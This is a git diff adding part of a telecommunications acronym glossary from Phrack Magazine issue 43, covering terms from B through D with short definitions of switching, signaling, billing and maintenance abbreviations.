+BHC          Busy hour call
+BHC          Busy hour calls
+BIB          Backward indicator bit (SS7)
+BICU         Bus interface control unit
+BIFIFO       Bidirectional fifo
+BIR          Bit receiver
+BIR          Bus interface register
+BISDN        Broadband ISDN
+BISP         Business information system program
+BISYNC       Binary synchronous communications
+BIT          Bit
+BIT          Bit transmitter
+BITNET       Because-it's-time network
+BITR         Bit transceiver
+BIX          Building internal cross-connects
+BK           Back
+BKUP         Backup
+BKUP         Requests a backup
+BL           Bell & lights INTER/TRA blocal 1-26
+BL           Bridge lifter
+BL           Bridge lifters - COSMOS command
+BL/DS        Busy line/don't answer
+BLA          Blocking acknowledgement (SS7: in ISUP)
+BLF          Busy line field
+BLFCA        Blocking a fully coded addressed international outbound call
+              routed to a non-common channel signaling trunk
+BLK          Block
+BLKD         Blocked
+BLO          Blocking (SS7: in ISUP)
+BLS          Bridge lifter status
+BLS          Business listing service
+BLV          Busy line verification
+BMC          Billing media coverage
+BMD          Batch mode display
+BMI          Batch mode input - TIMEREL and DEMAND
+BMOSS        Building maintance operations service system
+BMR          Batch mode release
+BMU          Basic measurement unit (dip)
+BND          Band number
+BNS          Billed number screening
+BNSDBOV      BVA BNS message received indicating data base overload
+BNSDBUN      BVA BNS message returned because data base unable to process
+BNSGMSG      BVA BNS message received garbled
+BNSNBLK      BVA BNS message returned because of network blockage
+BNSNCON      BVA BNS message returned because of network congestion
+BNSNRTE      BVA BNS message returned because of no routing data
+BNSTOUT      BVA BNS message returned because of timeout
+BNSUNEQ      BVA BNS message returned because of unequipped destination
+BNSURPY      BVA BNS message received with an unexpected reply
+BNx          Business name x (x = number of line)
+BOC          Bell operating companies
+BOC          Bell operating company
+BOCC         Building operations control center
+BOP          Byte oriented protocol
+BOR          Basic output report
+BORSCHT      Battery
+BOS          Bit oriented signaling
+BOS          Business office supervisor
+BOSS         Billing and order support system
+BOSS         Business office service system (NYNEX)
+BOT          Beginning of tape
+BOT          Bottom
+BPI          Bits per inch
+BPOC         Bell point of contact
+BPS          Bits per second
+BPSK         Binary psk
+BPSS         Basic packet-switching service
+BPUMP        Backup pump
+BR           Bit robbing (CAS-BR)
+BRAT         Business residence account tracking system
+BRCF         Business and residential customer service feature
+BRCS         Business and residential customer services
+BRCS         Business residence custom service
+BRDCST       Broadcase
+BRDG         Bridge
+BRDGD        Bridged
+BREVC        Brevity control
+BRG          Baud rate generator
+BRI          Basic rate interface
+BRITE        Basic rate interface transmission extension (5ESS)
+BRK          Break
+BRM          Basic remote module
+BRM          Bell communications research practice
+BRST         Bridge signature table
+BS           Backspace
+BS           Banded signaling
+BS           Bias battery (-19.1v)
+BS           Siren control INTER/TRA blocal 1-26
+BSA          Basic serving arrangements
+BSBH         Busy season busy hour
+BSC          Business service center
+BSC/RSC      Business/residence service center
+BSCM         Bisynchronous communications module
+BSDPE        SDLC B reset
+BSE          Basic service elements
+BSF          Bell shock force
+BSI          British standards institution
+BSN          Backward sequence number (SS7)
+BSOC         Bell systems operating company
+BSP          Bell system practice
+BSRF         Basic standard reference frequency
+BSRFS        Bell system reference frequency standard
+BST          Basic services terminal
+BSTJ         Bell system technical journal
+BT           British telecom
+BTAM         Basic telecommunications access message
+BTH          Both
+BTL          Bell telephone laboratories
+BTN          Billing telephone number
+BTSR         Bootstrapper board
+BTU          British thermal unit
+BUFF         System buffers (NTI)
+BVA          Billing validation application
+BVAPP        Billing verification and authorization for payment process
+BVC          Billing validation center
+BVS          Basic voice service
+BWM          Broadcast warning message
+BWT          Broadcast warning twx
+BWTS         Bandwidth test set
+BYF          Display the bypass file
+BYP          Change the contents of the bypass file
+C            Counting rate
+C            Current supervision
+C            Scan point (SP)
+C&A          Centrifugal and absorption
+C-ACD        Commercial-automatic call distributor (OSPS)
+C-NCH        C-notch
+C/I          Command/indicate
+C/S UNIT     Combiner and splitter
+C1           Circuit system
+CA           Cable
+CA           Cable number
+CA           Collision avoidance
+CA           SSN access INTER/TRA blocal 1-26
+CABS         Carrier access billing system
+CAC          Calling-card authorization center
+CAC          Carrier access code
+CAC          Circuit administration center
+CAC          Customer administration center
+CACHE        Cache errors
+CAD          Computer-aided dispatch
+CAD          Critical alarm display
+CADN         Circuit administration.
+CADV         Combined alternate data/voice
+CAF          Circuit reset acknowledgment failure
+CAFD         Comptrollers' automatic message accounting format description
+CAFD         Controllers automatic message accounting format description
+CAI          Address incomplete received
+CAI          Call assembly index
+CAIS         Colocated automatic intercept system
+CALRS        Centralized automatic loop reporting system
+CAM          Communication access method
+CAM          Computer aided manufacturing
+CAM          Content adressable memory
+CAM          Control administration module
+CAMA         Central automatic message accounting.
+CAMA         Centralized auto message accounting
+CAMA         Centralized automatic message accounting
+CAN          Cancel
+CANC         Cancel (i.451)
+CANF         Clear the cancel from
+CANT         Clear the cancel to
+CAP          Capacitance
+CARL         Computerized administrative route layout
+CAROT        Centralized automatic reporting on trunks
+CAROT        Centralized automatic reporting on trunks.
+CAS          Cannel associated signaling
+CAS          Circuit associated signaling
+CAS          Computerized autodial system
+CAS          Craft access system (SARTS)
+CAS          Customer account service
+CAS7ABM      CAS common channel signaling 7 (CCS7) abort message received
+CAS7ACG      CAS CCS7 ACG invoke component received
+CAS7GMG      CAS CCS7 received with invalid format reply
+CAS7GWE      CAS CCS7 error
+CAS7NCG      CAS CCS7 message returned because of network congestion
+CAS7NFL      CAS CCS7 message returned because of network failure
+CAS7RCR      CAS CCS7 reject component received
+CAS7SCG      CAS CCS7 message returned because of subsystem congestion
+CAS7SFL      CAS CCS7 message returned because of subsystem failure
+CAS7TAN      CAS CCS7 message returned
+CAS7TOT      CAS CCS7 query which timed out before reply received
+CASDBOV      CAS message received indicating data base overload
+CASDBOV      Customer account services (CAS) message received indicating data base overload
+CASDBOV      Customer account services (CAS) message received indicating database overload
+CASDBUN      CAS message returned
+CASGMSG      CAS message received garbled
+CASNBLK      CAS message returned because of network blockage
+CASNCON      CAS message returned because of network congestion
+CASNRTE      CAS message returned because of no routing data
+CASTOUT      CAS message returned because of timeout
+CASUNEQ      CAS message returned because of unequipped destination
+CASURPY      CAS message received with an unexpected reply
+CAT          Centrex access treatment
+CAT          Craft access terminal
+CATLAS       Centralized automatic trouble locating and analysis system
+CAY          Create an assembly
+CB           OCC audio facilitys INTER/TRA blocal 1-26
+CBA          Change back acknowledgement (SS7: in mtp)
+CBD          Change back declaration (SS7: in mtp)
+CBEMA        Computer and business equipment manufacturers' assc.
+CBERR        Correctable bit error
+CBS          Crossbar switching
+CBX          Computerized branch exchange
+CC           Call count
+CC           Central control
+CC           Central controller
+CC           Common channel (CAS-CC)
+CC           Common control
+CC           Connection confirm
+CC           Country code
+CC           Country code (ISO 7498)
+CC           Initials of person closing report out to catlas.
+CC           OCC digital facility-medium speed INTER/TRA blocal 1-26
+CC1          Call control 1 (IOS)
+CCA          Change customer attributes
+CCA          Computer content architecture (ISO 8637/2)
+CCBS         Completion of call to busy subscribers (i.253 c)
+CCC          Centeral control complex
+CCC          Central control complex
+CCC          Clear channel capability
+CCC          Computer control center
+CCD          Change due date - COSMOS command
+CCDDBOV      BVA calling card (CCRD) message received indicating data base
+               overload
+CCDDBUN      BVA CCRD message returned because data base unable to process
+CCDGMSG      BVA CCRD message received garbled
+CCDNBLK      BVA CCRD message returned because of network blockage
+CCDNCON      BVA CCRD message returned because of network congestion
+CCDNRTE      BVA CCRD message returned because of no routing data
+CCDR         Calling card
+CCDTOUT      BVA CCRD message returned because of timeout
+CCDUNEQ      BVA CCRD message returned because of unequipped destination
+CCDURPY      BVA CCRD message received with an unexpected reply
+CCF          Custom calling features
+CCH          Connections per circuit per hour
+CCIR         Comite' consultatif international des radio communications
+CCIR         Consultative committee for radiocomunication (international radio
+CCIS         Common channel interoffice signaling
+CCITT        Comite' consultatif international telegraphique et telephonique
+CCITT        Consultative committee for internat. telephone and telegraph
+CCM          Customer control management
+CCNC         CCS network control
+CCNC         Common channel network controller
+CCNC         Computer/communications network center
+CCOA         Cabinet control and office alarm
+CCP          Call control part
+CCR          Clock configuration register
+CCR          Continuity check request (SS7: in ISUP)
+CCR          Customer-controlled reconfiguration
+CCRC         Corrupt crc (IOM2 monitor command)
+CCRD         Calling card (5E)
+CCRS         Centrex customers ... system
+CCS          Centum Call Seconds
+CCS          Cluster support system
+CCS          Common channel signaling
+CCS          Custom calling services  (NTI)
+CCS          Hundred (C) call seconds
+CCS          Hundred call seconds
+CCSA         Common control switching arrangement
+CCT          Central control terminal
+CCT          Initialize and update the contractor-transducer file
+CCTAC        Computer communications trouble analysis center
+CCU          Colt computer unit
+CCU          Combined channel units
+CCU          Communication control unit
+CCV          Calling card validation
+CD           Call deflection (i.252 e)
+CD           Collision detection (->csma/)
+CDA          Call data accumulator
+CDA          Change distribution attributes
+CDA          Coin detection and announcement
+CDACS        Concentrating DACS
+CDAR         Customer dialed account recording
+CDC          Central distrubtion center
+CDCF         Cumulative discounted cash flow
+CDD          Change due date
+CDF          Combined distributing frame
+CDF          DTF coin
+CDFI         Communication link digital facilities interface
+CDI          Circle digit identification
+CDI          Connected line identification (i.251 C/E)
+CDI          Control and data interface.
+CDI          Control data interface
+CDIG         Circle digit translation  (NTI)
+CDM          Coax data module
+CDMA         Code division ma
+CDO          Community dial office
+CDPR         Customer dial pulse receiver
+CDQ1         Custom calling services discount quote
+CDR          Call detail record
+CDR          Call dial rerouting
+CDR          Collision detect input line
+CDR          Cut thru dip report
+CDRR         Call detail recording and reporting
+CDS          Circuit design system
+CDS          Codes
+CDS          Craft dispatch system
+CE           Collision elimination (->CSMA/)
+CE           Common equipment data  (NTI)
+CE           Conducted emission (EME)
+CE           SSN station line INTER/TRA blocal 1-26
+CEF          Cable entrance facility
+CEI          Comparable efficient interconnection
+CEI          Comparably efficient interconnection
+CEN          European committee of standards
+CENELEC      European committee of standards (electrotechnics)
+CEP          Connection endpoint
+CEPT         European conference of post/telecom administrations
+CES          CC error summary
+CEU          CCS estimated usage
+CEV          Control environmental vault
+CEV          Controlled environment vault
+CF           Coin first
+CF           OCC special facility INTER/TRA blocal 1-26
+CFA          Carrir failure alarms
+CFA          Change facility attributes
+CFC          Cost function code
+CFCA         Communications fraud control association
+CFD          Coinless ANI7 charge-a-call
+CFGN         Configuration
+CFI          Configurable interface (SIPB)
+CFINIT       Custom calling feature table
+CFN          Call forward number
+CFND         Call forward number don't answer
+CFNR         Call forwarding no reply (i.252 c)
+CFP          Call forwarding busy (i.252 b)
+CFP          Print the class of service/features for an electromechanical
+               enti
+CFR          Code of federal regulations
+CFT          Craft
+CFU          Call forwarding unconditional (i.252 d)
+CFU          Change facility usage
+CG           Control group number
+CG           OCC telegraph facility INTER/TRA blocal 1-26
+CG01         Carrier group in alarm  - 1AESS carrier group
+CG03         Reason for above - 1AESS carrier group
+CGA          Carrier group alarm
+CGA          Carrier group assignment
+CGAP         Call gapping
+CGAP         Call gapping code controls messages.
+CGB          Circuit group blocking (SS7: in ISUP)
+CGBA         CGB acknowledgement
+CGM          Computer graphics metafile (ISO DIS 8632)
+CGN          Concentrator group number
+CGNC         Connector group network controller
+CGU          Circuit group unblocking (SS7: in ISUP)
+CGUA         CGU acknowledgement
+CH           Change
+CH           OCC digital facility high-speed INTER/TRA blocal 1-26
+CHAN         Channel
+CHAPS        UNK - a known AT&T System - def. unknown
+CHAR         Character
+CHG LASG     Change loop assignment
+CHK          Check
+CHR          Chronical
+CI           Concentrator identifier trunk INTER/TRA blocal 1-26
+CI0IN        Control interface 0 interrupt
+CI1IN        Control interface 1 interrupt
+CIB          Centralized intercept bureau
+CIC          Carrier identification codes
+CIC          Circuit identification code
+CIC          Customer Information Center (AT&T)
+CICS         Customer information control system
+CID          Connection identification
+CIE          Company establish company initiated change
+CIF          Common intermediate format (for ISDN high end video)
+CIH          Craft interface handler
+CII          Call identity index
+CII          Initial address message (IAM) irregularity (incoming)
+CIMAP        Circuit installation and maintance assistance program
+CIMAP/CC     Circuit installation and maintenance assistance/control
+              center
+CIP          Control interface port
+CIRR         C/I receive register
+CIS          Crimeline information systems
+CIS          Customized intercept service
+CIXR         C/I transmit register
+CJ           OCC control facility INTER/TRA blocal 1-26
+CK           Checkbits
+CK           OCC overseas connecting facility wide-band INTER/TRA blocal 1-26
+CKF          Continuity check failure (incoming)
+CKID         Circuit identification
+CKL          Circuit location
+CKS          Clock select bit
+CKT          Circuit
+CKT          Circuit.
+CKTRY        Cuicuitry
+CL           Centrex CO line INTER/TRA blocal 1-26
+CLASS        Centralized local area selective signaling
+CLASS        Custom local area signaling service
+CLC          Common language code for an entity
+CLCI         Common language circuit identification
+CLCT         Network management control counts
+CLDIR        Call direction
+CLDN         Calling line directory number
+CLEI         Common language equipment identifier
+CLF          Creating dips upper bound load factor
+CLFI         Common lang facilities identication
+CLI          COSMOS processed alit reports
+CLI          Calling line ident
+CLID         Calling line identification
+CLIP         Calling line identification presentation (i.251 c)
+CLIR         Calling line identification restriction (i.251 d)
+CLK          Clock
+CLL          Creating dips lower bound load factor
+CLLI         Common-language location identification
+CLNK         Communication link
+CLNKs        Communication links
+CLNORM       Communication link normalization
+CLR          Circuit layout record
+CLR          Clear
+CLRC         Circuit layout record card
+CLS          CLCI in serial number format
+CLS          Connectless-mode service
+CLSD         Closed
+CLSV         Class of service
+CLT          CLCI telephone number format
+CLT          Communications line terminal
+CLUS         Cluster data   (NTI)
+CM           C-message frequency weighting
+CM           Communication module
+CM           Connection memory
+CM           OCC video facility INTER/TRA blocal 1-26
+CMAC         Centralized maintenance and administration center
+CMAP         Centralized maintance and administration position
+CMC          Call modification completed (SS7: in ISUP)
+CMC          Cellular mobile carrier
+CMC          Cellular modile carrier
+CMC          Construction maintenance center
+CMD          Command
+CMDF         Combined main distributing frame
+CMDS         Centralized message data system
+CMF          Capacity main station fill
+CMP          Communication module processor
+CMP          Communications module processor
+CMP          Companion board
+CMP          Corrective maintenancean practices
+CMPR         Compares
+CMR          Call modification request (SS7: in ISUP)
+CMR          Cellular mobile radio
+CMRJ         CMR reject (SS7: in ISUP)
+CMS          Call management system
+CMS          Circuit maintance system
+CMS          Circuit maintance system 1C
+CMS          Circuit maintenance system
+CMS          Communications management subsystem
+CMS          Conversational monitoring system
+CMT          Cellular mobile telephone
+CMT          Combined miscellaneous trunk frame
+CMU          CCS measured usage
+CMU          Colt measurement unit
+CN           C-notch frequancy weighting
+CN           Change notice
+CN           Changel noticee
+CN           Connection
+CN           SSN network trunk INTER/TRA blocal 1-26
+CN/A         Customer name/address
+CN02         List of pay phones with coin disposal problems - 1AESS coin
+              phone
+CN03         Possible trouble - 1AESS coin phone
+CN04         Phone taken out of restored service because of possible coin
+              fraud
+CNA          Communications network application
+CNAB         Customer name/address bureau
+CNCC         Customer network control center
+CNI          Common network interface
+CNMS         Cylink network management system
+CNS          Complimentary network service
+CNS          Concentrating network system
+CNT          Count
+CNTS         Counts
+CNVT         Converted
+CO           Central office
+CO           Continuous (SARTS)
+CO           OCC overseas connecting facility INTER/TRA blocal 1-26
+CO UN        Central office unit code
+COA          Change over acknowledgement (SS7 in MTE)
+COAM         Centralized operation
+COAM         Customer owned and maintained
+COC          Circuit order control
+COCOT        Customer-owned coin-operated telephone
+COD          Code
+CODCF        Central office data connecting facility
+CODEC        Coder/decoder
+COE          Central office entity
+COE          Central office equipment
+COEES        COE engineering system
+COEES        Central office equipment engineering system
+COER         Central office equipment record
+COEST        Central office equipment signature table
+COF          Confusion received (outgoing)
+COFA         Change of frame alignment (DS-1)
+COG          Centralized operations group
+COGRDG       Central office grounding
+COLP         Connected line identification presentation
+COLR         Connected line identification restriction
+COLT         Central office limit table
+COLT         Central office line tester
+COM          Common controller
+COM          Communication
+COM          Complement size
+COM          Computer output microfilm
+COM/EXP      PCM-compander/expander
+COMM         Comunication
+COMMS        Central office maintenance management system
+COMMS-PM     Central office maintenance management system-preventive
+              Maintenance
+COMP         Computed
+COMPNY       Company
+COMPS        Central Office Managenment Program (GTE)
+COMSAT       Communications satellite
+CON          Concentrator - COSMOS command
+COND         Conditions
+CONF         Conference calling (i.254 a)
+CONFIG       Configutation
+CONN         Connect msg. (i.451)
+CONN         Connector
+CONN         Nailed-up connections
+CONT         Control
+CONTAC       Central office network access
+CONUS        Continental united states
+COO          Change over order (SS7: in MTP)
+COP          Call offering procedure
+COPY         Data copied from one address to another - 1AESS copy
+CORC         Commands and responses definition and compressing program (IOS)
+CORC         Customer riginated recent change
+CORCs        Customer-originated recent changes
+CORNET       Corperate network
+COS          Connection-mode service
+COSIB        Central office platform operator service interface board
+COSMIC       Common systems main interconnection frame system (frame)
+COSMOS       Computer system for mainframe operations
+COT          Centeral office terminal
+COT          Central office technician
+COT          Central office terminal
+COT          Central office terminal (opposite to RT)
+COT          Continuity (SS7: in ISUP)
+COTM         Central office overload call timing (NTI)
+CP           Cable pair
+CP           Call processing parameters  (NTI)
+CP           Communication processor (SARTS)
+CP           Concentrator identifier signaling link INTER/TRA blocal 1-26
+CP           Control program
+CPA          Centralized/bulk power architecture
+CPC          Cellular phone company
+CPC          Circuit provision center
+CPC          Circuit provisioning center
+CPC          Circuit provisioning center (special services design group)
+CPCE         Common peripheral controller equipment
+CPD          Central pulse distributor
+CPD          Common packet data channels
+CPE          Customer premise equipment
+CPE          Customer premises equipment
+CPG          Call progress (SS7: in ISUP)
+CPH          Cost per hour
+CPI          COSMOS-premis interface
+CPI          Computer private branch exchange interface
+CPIE         CP or AM intervention interrupt error
+CPM          COSMOS performance monitor
+CPM          Citcuit pack module
+CPM          Cost per minute
+CPMP         Carrier performance measurement plan
+CPS          Cycles per second
+CPU          CCS capacity usage
+CPU          Call pick up
+CPU          Call pickup group
+CPU          Central processing unit
+CQM          Circuit group query (SS7: in ISUP)
+CQR          CQM response
+CR           Carriage return
+CR           Control Record
+CR           Control response
+CR           OCC backup facility INTER/TRA blocal 1-26
+CRAS         Cable repair administrative system
+CRC          Customer record center
+CRC          Cyclic redundancy check
+CRCOK        CRC ok!  (C/I channel code)
+CRE          Create
+CRED         Credit card calling (i.256 a)
+CREF         Connection refused
+CREG         Concentrated range extension with gain
+CRF          Continuity recheck failure (outgoing)
+CRFMP        Cable repair force management plan
+CRG          Creg tag
+CRIS         Customer records information system
+CROT         Centralized automatic reporting of trunks  (NTI)
+CRR          Reset received (incoming)
+CRS          Centralized results system
+CRSAB        Centralized repair service answering bureau
+CRST         Specific carrier restricted
+CRT          Cathode ray tube
+CRT          Cathode-ray tube
+CRTM         Central office regular call processing timing  (NTI)
+CS           Cable switching
+CS           Call Store
+CS           Channel service INTER/TRA blocal 1-26
+CS           Conducted susceptibility (EMS)
+CS           Customer class of service
+CSA          Carrier serving area
+CSACC        Customer service administration control center
+CSAR         Centralized system for analysis and reporting
+CSAR         Centralized system for analysis reporting
+CSC          Cell site controller
+CSD          Circuit specific data
+CSDC         Circuit switched digital capability
+CSDN         Circuit-switched data network (t.70)
+CSF          Critical short form
+CSMA/        Carrier sense multiple access
+CSMCC        Complex services maintenance control center
+CSNET        Computer science network
+CSO          Central services organization
+CSO          Cold start only (in eoc)
+CSP          Coin sent paid
+CSP          Coin set paid
+CSPDN        Circuit-switched public data network
+CSR          Clock shift register
+CSR          Customer service records
+CSS          Computer sub-system
+CSS          Computer subsystem
+CSS          Customer service system
+CSSC         Customer service system center
+CST          Call state  or  current state   or  change state (QUASI SDL)
+CST          Combined services terminal
+CSU          Channel service unit
+CSUS         Centralized automatic message accounting suspension (NTI)
+CT           Call transfer (i.252 a)
+CT           Control terminal
+CT           SSN tie trunk INTER/TRA blocal 1-26
+CT01         Manually requested trace line to line information
+              follows - 1AESS
+CT02         Manually requested trace line to trunk information
+              follows - 1AESS
+CT03         Intraoffice call placed to a number with CLID - 1AESS call trace
+CT04         Interoffice call placed to a number with CLID - 1AESS call trace
+CT05         Call placed to number on the ci list - 1AESS call trace
+CT06         Contents of the CI list - 1AESS call trace
+CT07         ACD related trace - 1AESS call trace
+CTC          Central test center
+CTC          Centralized test center (DDS)
+CTC          Centralized testing center
+CTC          Complete a cable transfer or complete a cable throw
+CTD          Circuit test data
+CTE          Cable throw order establishment
+CTF          Display the contacter-transducer file
+CTI          Circuit termination identification
+CTL          Cable throw with line equipment assignment
+CTL          Central operator control
+CTM          Cable throw modification
+CTM          Contac trunk module
+CTMC         Communications terminal module controller
+CTMS         Carrier transmission measuring system
+CTO          Call transfer outside
+CTO          Continuity timeout (incoming)
+CTP          Print cable transfer frame work
+CTR          Cable throw replacement
+CTS          Cable throw summary
+CTS          Call through simulator
+CTS          Clear to send
+CTSS         Cray time sharing system
+CTT          Cartridge tape transport
+CTT          Cut through tag
+CTTC         Cartridge tape transport controller
+CTTN         Cable trunk ticket number
+CTTU         Central trunk testing unit.
+CTU          Channel test unit
+CTW          Withdraw a cable transfer or a cable throw
+CTX          Centrex group number
+CTX          Various centrix verifies
+CU           Channel  unit
+CU           Channel unit
+CU           Control unit
+CU           Customer unit
+CU/EQ        Common update/equipment system
+CU/TK        Common update/trunking system
+CUCRIT       Capital utilization criteria
+CUG          Closed user group (i.255 a)
+CUP          Common update processor
+CUSTAT       Control unit hardware status
+CUT          Circuit under test
+CUTOVER      Cutover (pre-cut) inactive state.
+CV           OCC voice grade facility INTER/TRA blocal 1-26
+CVN          Vacant national number received (outgoing)
+CVR          Compass voice response
+CW           Call waiting (i.253 a)
+CW           OCC wire pair facility INTER/TRA blocal 1-26
+CWC          City-wide centrex
+CWD          Call waiting deluxe
+CXC          Complex service order input checker
+CXM          Centrex table management
+CXT          Complex order inquiry for nac review
+CZ           OCC access facility INTER/TRA blocal 1-26
+CorNet       Corporate network protocol (ECMA and CCITT q.930/931 oriented)
\ No newline at end of file
diff --git a/phrack43/22.txt b/phrack43/22.txt
new file mode 100644
index 0000000..37b1bda
--- /dev/null
+++ b/phrack43/22.txt
@@ -0,0 +1,1210 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 22 of 27
+
+                               {Acronyms Part II}
+
+D            Data
+D            Default supervision
+D            Digits
+D            Dispach
+D            Hotel/motel equipment from trouble report (TSPS only)
+D-CTL        D channel controller (IDEC)
+D/A          Digital to analog
+D1PK         DS-1 interface pack  (SCM-10S NTI)
+D1PK         DS-1 interface pack (SCM-10S MUX  NTI)
+DA           Digital data off-net extention INTER/TRA blocal 1-26
+DA           Directory assistance
+DAC          Digital to analog converter
+DAC          Dispatch Administration Center
+DACC         Directort assistance call completion
+DACK         Direct memory access acknowledge
+DACOM        Data communictions corp. of korea (ROK)
+DACS         Digital access cross-connect system
+DACS         Digital accessed and cross-connected system
+DACS         Directory assistance charging system
+DACTVTD      Deactivated
+DAEDR        Delimitation
+DAIS         Distributed automatic intercept system
+DAML         Digital added main line (pair gain)
+DAMT         Direct access mechanize testing
+DAP          Display administration process
+DAP          Document application profile
+DARC         Division alarm recording center
+DART         Distribution area rehabilitation
+DARU         Distributed automatic intercept system audio response unit
+DAS          Data auxiliary set
+DAS          Directory assistance system
+DAS          Distributor and scanner
+DAS-WDT      Distributor and scanner-watch dog timer
+DAS/C        Directory assistance system/computer
+DASD         Direct access storage device
+DASS2        Digital access signaling system 2 (BT)
+DAU          Digital access unit
+DAV          Data above voice
+DAY          Delete an assembly
+DB           DSSDS 1.5 mb/s access line INTER/TRA blocal 1-26
+DB           Decibel
+DBA          Data base administrator
+DBAC         Data base administration center
+DBAS         Data base administration system
+DBCS         Data bank control system
+DBL          Data base load
+DBM          Database manager
+DBMS         Data base management system
+DBOS         Data bank organization system
+DBS          Duplex bus selector
+DBSS         Data bank security system
+DC           Device cinfirmation (C/I channel code)
+DC           Dial code
+DC           Direct current
+DCC          Data collection computer
+DCC          Data country code (ISO 7498)
+DCC          Destination code cancellation
+DCC          Destination code cancellation control
+DCC          Digroup core controller
+DCCS         Discontiguous shared segments
+DCD          Data collection device
+DCE          Data circuit terminal equipment
+DCE          Data circuit-terminating equipment
+DCE          Data communications equipment
+DCE          Digital carrier equipment
+DCG          Default cell group
+DCH          D channel handler
+DCH          D-channel handling bit
+DCH          Discharge
+DCHOOS       D-channel is out of service.
+DCL          Data clock (i.e. IOM2)
+DCL          Dec control language
+DCLU         Digital carrier line uint
+DCLU         Digital carrier line unit
+DCM          Digital carrier module
+DCME         Digital circuit multiplexing equipment
+DCMS         Distributed call measurement system
+DCMU         Digital concentrator measurement unit
+DCN          List disconnected and changed numbers
+DCP          D channel processor
+DCP          Duplex central processor
+DCPR         Detailed contuing property record (pics/dcpr)
+DCPSK        Differential coherent phase-shift keying
+DCS          Data communications subsystem
+DCS          Digital crosconnect system
+DCS          Digital cross-connect system
+DCS          Direct current signaling
+DCSO         Display compleated service order (lmos command)
+DCT          Digital carrier trunk
+DCTB         Dct bank
+DCTEXT       DCT extended
+DCTN         Defense commercial telecommunications network
+DCTS         Dimension custom telephone service
+DCTUCOM      Directly connected test unit common board
+DCTUPORT     Directly connected test unit port circuit
+DCn          Device control n
+DD           Data downstream (i.e. IOM2)
+DD           Delay dial
+DD           Disk drives
+DD           Due date
+DD           Total switching control center (SCC) and field work time.
+DDC          Direct department calling
+DDCMP        Daily display conversation mode and printer
+DDD          Direct distance dialing
+DDGT         Digital data group terminal
+DDI          Direct dialing-in (i.251 A)
+DDN          Defense data network
+DDOV         Digital data over voice
+DDS          DDS loopback test (SARTS command)
+DDS          Dataphone digital service
+DDS          Digital data service
+DDS          Digital data system
+DDS          Digital data system (the network) dataphone  digital
+DDS          Digital dataphone service
+DDS          Display the DS table
+DDX          Digital data exchange
+DDX          Distributed data exchange
+DEAC         Deactivation (C/I channel code)
+DEACT        Deactivate
+DEC          Digital equipment corporation
+DECT         Digital european cellular phone
+DEL          Delete
+DEN          Digital equipment number
+DERP         Defective equipment replacement program
+DES          Data encryption standard
+DES          Destination
+DEST         Destinations
+DET          Detatch MSG. (i.451)
+DEV          Deviation
+DEV          Device
+DEW          Distant early warning (line)
+DF           Distributing frame
+DF           Distribution frame
+DF           HSSDS 1.5 mb/s hub to hub INTER/TRA blocal 1-26
+DFC          Disk file controller
+DFI          Digital facility interface
+DFI          Digital facility interface.
+DFI          Digital family interface
+DFIH         Digital facility interface circuit pair
+DFMS         Digital facility management system
+DFTAC        Distributing frame test access circuit
+DG           HSSDS 1.5 mb/s hub to earth station INTER/TRA blocal 1-26
+DGCT         Diagnostic control table
+DGN          Diagnose
+DGN          Memory failure in CS/PS diagnostic program - 1AESS mem diag
+DH           Digital service INTER/TRA blocal 1-26
+DI           Deactivation indication (C/I channel code)
+DI           Direct-in dial INTER/TRA blocal 1-26
+DI           Unk division?
+DIA          Document interchange architecture
+DIAG         Diagnostic
+DIC          Digital concentrator
+DIC          Digital interface controller
+DID          DI downstream
+DID          Direct inward dialing
+DIF          Digital frame interface
+DIF          Digital interface
+DIF          Digital interface frame
+DIFF         Difference
+DILEP        Digital line engineering program
+DIM          Data in the middle
+DIP          Dedicated inside plant  COSMOS command
+DIP          Dip creation option
+DIP          Document interchange protocol (lower sublayer of OSI layer 6)
+DIP          Dual in-line package
+DIR          Direction
+DIR          Directory
+DIR          Standard dip report
+DIS          Disconnect
+DIS          Display
+DISA         Direct inward system access
+DISABL       Disable
+DISC         Disconnect (LAP-D command)
+DISD         Direct inward subscriber access
+DIST         Distribute point board
+DIU          Deactivate indication
+DIU          Digital interface unit
+DIU          Digroup interface unit (DACS)
+DIV          (Ger) Digital exchange
+DIVF         (Ger) Div for long distance service
+DIVO         (Ger) Div for local service
+DJ           Digit trunk INTER/TRA blocal 1-26
+DK           Data link INTER/TRA blocal 1-26
+DL           Dial
+DL           Dictation line INTER/TRA blocal 1-26
+DL1PE        DLI 1 parity error
+DL5MDA       Someone who collects each ISDN abbrevation crossing his way
+DLAB         Divisor latch access bit
+DLC          Data link control
+DLC          Data link controller assignment for clusters
+DLC          Digital loop carrier
+DLCI         Data link connection identifier (i.440: SAPI+TEI)
+DLCU         Digital line carrier unit
+DLE          Data link escape (ascii control)
+DLI          Data link interface
+DLI0I        Data link 0 interrupt
+DLI1I        Data link 1 interrupt
+DLISW        DLI switch error
+DLL          Dial long lines
+DLM          Data link module
+DLN          Direct link node
+DLNORSP      Init response not received from data link.
+DLOPE        Dual link interface (DLI) 0 parity error
+DLP          Data level point
+DLS          Digital line section
+DLS          Digital link service
+DLTHA        Display trouble history all (LMOS command)
+DLTU         Digital line trunk unit
+DLTU         Digital line/trunk unit
+DLU-PG       Digital line unit-pair gain
+DLUC         Digital line unit control
+DLYR         Delayed readiness
+DM           DMR
+DM           Delta modulation
+DM           Disconnected mode (LAP-D response)
+DMA          Direct memory access
+DMB          Digital multipoint bridge
+DMERT        Duplex multiple environment real time
+DMI          Digital multiplexed interface
+DML          Data manipulation logic
+DMLHG        DSN/AUTOVON MLHG
+DMQ          Deferred maintenance queue
+DMS          Data management system
+DMS          Digital multiplex system  (i.e. DMS 10, DMS 100)
+DMS          Digital multiplexed system
+DMU          Data manipulation unit
+DN           Directory number
+DN           Directory numbers
+DN           Distribution network panel
+DN           Down
+DN           Mail distribution frame - COSMOS defult
+DNC          Dynamic network controller
+DNH          Directory Number Hunting
+DNHR         Dynamic non hierarchical routing
+DNHR         Dynamic nonhierarchical routing
+DNI          Digital network interconnecting
+DNIC         Data network identification code
+DNIC         Data network identification code (ISO 7498)
+DNR          Detaled number record
+DNR          Dialed number recorder
+DNX          Dynamic network X-connect
+DO           Direct-out dial INTER/TRA blocal 1-26
+DOC          Dynamic overload control
+DOC          Dynamic overload controls messages.
+DOCS         Display operator console system
+DOD          (USA) Dept. of defense
+DOJ          Department of justice
+DOM          Data on master group
+DOTS         Digital office timing supply
+DOV          Data over voice
+DP           Demarcation point
+DP           Dial pulse
+DP           Digital data-2 4 kb/s INTER/TRA blocal 1-26
+DPA          Different premises address
